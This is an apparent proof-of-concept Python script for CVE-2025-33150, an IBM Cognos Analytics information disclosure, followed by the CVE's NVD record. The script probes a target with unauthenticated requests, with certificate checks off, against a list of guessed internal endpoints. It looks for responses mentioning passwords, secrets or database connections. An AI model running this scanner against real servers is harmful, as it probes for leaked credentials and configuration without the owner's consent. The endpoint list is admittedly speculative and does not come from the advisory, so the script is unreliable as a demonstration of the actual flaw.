CVE-2025-33150

#!/usr/bin/env python3 """ CVE-2025-33150 PoC - IBM Cognos Analytics Hidden Page Information Disclosure This PoC demonstrates how to discover and access hidden pages that leak package parameter information. Note: Only for authorized security testing with proper authorization. """ import requests import sys from urllib.parse import urljoin def test_hidden_pages(target_url): """ Test for hidden pages in IBM Cognos Analytics that may expose sensitive information. """ # Common hidden page paths that might expose package parameters hidden_paths = [ '/api/internal/package_params', '/api/debug/config', '/internal/admin/settings', '/api/v1/package-info', '/debug/package_params', '/admin/system/config', '/api/system/package_info', '/cgi-bin/internal/get_params', '/api/v1/internal/configuration' ] results = [] for path in hidden_paths: full_url = urljoin(target_url.rstrip('/'), path) try: # Send GET request without authentication response = requests.get(full_url, timeout=10, verify=False) if response.status_code == 200: # Check if response contains sensitive parameter information content = response.text.lower() if any(keyword in content for keyword in ['package', 'parameter', 'config', 'db_', 'connection', 'password', 'secret']): results.append({ 'url': full_url, 'status': response.status_code, 'sensitive_data_found': True, 'content_length': len(response.text) }) elif response.status_code == 401 or response.status_code == 403: results.append({ 'url': full_url, 'status': response.status_code, 'sensitive_data_found': False, 'note': 'Access denied - endpoint exists but protected' }) except requests.exceptions.RequestException as e: print(f"Error testing {full_url}: {e}") return results def main(): if len(sys.argv) < 2: print("Usage: python3 cve_2025_33150_poc.py <target_url>") print("Example: python3 cve_2025_33150_poc.py https://cognos-server:9300") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning {target} for CVE-2025-33150...") print(f"[*] Testing hidden pages for package parameter disclosure\n") findings = test_hidden_pages(target) if findings: print(f"[+] Found {len(findings)} potential vulnerable endpoints:") for finding in findings: print(f"\n URL: {finding['url']}") print(f" Status: {finding['status']}") if finding.get('sensitive_data_found'): print(f" [!] WARNING: Sensitive package parameter data may be exposed!") print(f" Content Length: {finding.get('content_length', 'N/A')} bytes") else: print("[-] No vulnerable hidden pages found or target is patched.") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-33150", "sourceIdentifier": "[email protected]", "published": "2025-11-10T20:15:40.960", "lastModified": "2025-12-12T15:14:49.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Cognos Analytics Certified Containers 12.1.0 could disclose package parameter information due to the presence of hidden pages."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cognos_analytics_certified_containers:12.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "31D2CEEF-DCCA-46D4-B103-99DCD626CA37"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250395", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}